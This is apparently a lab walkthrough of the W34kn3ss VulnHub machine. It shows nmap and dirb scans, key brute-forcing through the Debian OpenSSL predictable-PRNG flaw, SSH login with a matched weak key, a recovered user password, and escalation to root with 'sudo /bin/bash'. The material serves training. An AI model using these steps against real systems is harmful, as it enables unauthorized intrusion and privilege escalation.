you can download it here: https://www.vulnhub.com/entry/w34kn3ss-1,270/

use nmap to do a thorough port scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
root@kali:~# nmap -p 1-65535 -T4 -v -A 192.168.227.159
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-08 12:53 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating ARP Ping Scan at 12:53
Scanning 192.168.227.159 [1 port]
Completed ARP Ping Scan at 12:53, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:53
Completed Parallel DNS resolution of 1 host. at 12:53, 0.15s elapsed
Initiating SYN Stealth Scan at 12:53
Scanning 192.168.227.159 [65535 ports]
Discovered open port 443/tcp on 192.168.227.159
Discovered open port 80/tcp on 192.168.227.159
Discovered open port 22/tcp on 192.168.227.159
Completed SYN Stealth Scan at 12:53, 2.45s elapsed (65535 total ports)
Initiating Service scan at 12:53
Scanning 3 services on 192.168.227.159
Completed Service scan at 12:53, 12.40s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.159
NSE: Script scanning 192.168.227.159.
Initiating NSE at 12:53
Completed NSE at 12:54, 14.51s elapsed
Initiating NSE at 12:54
Completed NSE at 12:54, 0.03s elapsed
Nmap scan report for 192.168.227.159
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 de:89:a2:de:45:e7:d6:3d:ef:e9:bd:b4:b6:68:ca:6d (RSA)
| 256 1d:98:4a:db:a2:e0:cc:68:38:93:d0:52:2a:1a:aa:96 (ECDSA)
|_ 256 3d:8a:6b:92:0d:ba:37:82:9e:c3:27:18:b6:01:cd:98 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo
| Issuer: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-05-05T11:12:54
| Not valid after: 2019-05-05T11:12:54
| MD5: f921 c4be 2c6e 89d6 adaf a7c2 8f39 a87d
|_SHA-1: 0b44 5a28 c4da 0bf8 b308 a782 4081 1218 101e 0feb
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
| http/1.1
|_ http/1.1
MAC Address: 00:0C:29:26:2F:49 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 9.796 days (since Wed May 29 17:47:24 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.73 ms 192.168.227.159

NSE: Script Post-scanning.
Initiating NSE at 12:54
Completed NSE at 12:54, 0.00s elapsed
Initiating NSE at 12:54
Completed NSE at 12:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.12 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

check its http server(port 80), just a default page of apache, use dirb to scan for sensitive directories and folders.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root@kali:~# dirb http://192.168.227.159/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jun 8 12:48:46 2019
URL_BASE: http://192.168.227.159/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.227.159/ ----
==> DIRECTORY: http://192.168.227.159/blog/
+ http://192.168.227.159/index.html (CODE:200|SIZE:10918)
+ http://192.168.227.159/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.227.159/test/
==> DIRECTORY: http://192.168.227.159/uploads/

---- Entering directory: http://192.168.227.159/blog/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.159/test/ ----
+ http://192.168.227.159/test/index.html (CODE:200|SIZE:72)

---- Entering directory: http://192.168.227.159/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Jun 8 12:48:52 2019
DOWNLOADED: 9224 - FOUND: 3

checked /uploads and /blog directories, all empty, checked /test/directory, found http://192.168.227.159/test/keys2.jpg

1

downloaded the jpg and analyzed using binwalk and exiftool, nothing special, tried steghide to extract informations, tried some keys but failed.

decided to check the nmap scan report and found this interesting hostname in https ssl cert:

weakness.jth

2

add this to /etc/host pointing to the same ip

3

check /private directory.

4

mykey.pub seems to be a public key, notes.txt contains something interesting.

5

it means openssl is vulnerable, search google “openssl 0.9.8c-1” and found this: https://www.exploit-db.com/exploits/5720

1
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH

take a look at the vulnerability description, the following line is removed from md_rand.c

1
2
3
MD_Update(&m,buf,j);
[ .. ]
MD_Update(&m,buf,j); /* purify complains */

Removing this line will result in random seed preditable as the random value will be the current process ID, which is maximum 32768, which results in a very small number of seed values(32768 in total) for PRNG operation, so we can generate all the possible private&&public key pairs and bruteforce the ssh server. the key pairs are available here: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

after download the key pairs and extract out,

now I need to find which public key of key pairs contains the keys in mykey.pub

1
find . | xargs grep -ri "AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw==" -l

6

so I can use 4161de56829de2fe64b9055711f531c1-2537 as private key to login to the sshd server

failed with root, take a look at the front page of http://weakness.jth/ and found something interesting.

2

there is an “n30” near the rabbit, I guess that is the username.

7

according to the hint in his home directory, I need to sudo to get root shell. but I don’t know n30’s password. there is an interesting file:

8

it is a python compiled executable file, I can easily decompile it here: https://python-decompiler.com/

9

this seems to be n30’s password:

1
dMASDNB!!#B!#!#33

check sudoers file

1
sudo -l

10

ok, n30 can sudo and execute anything.

1
sudo /bin/bash

11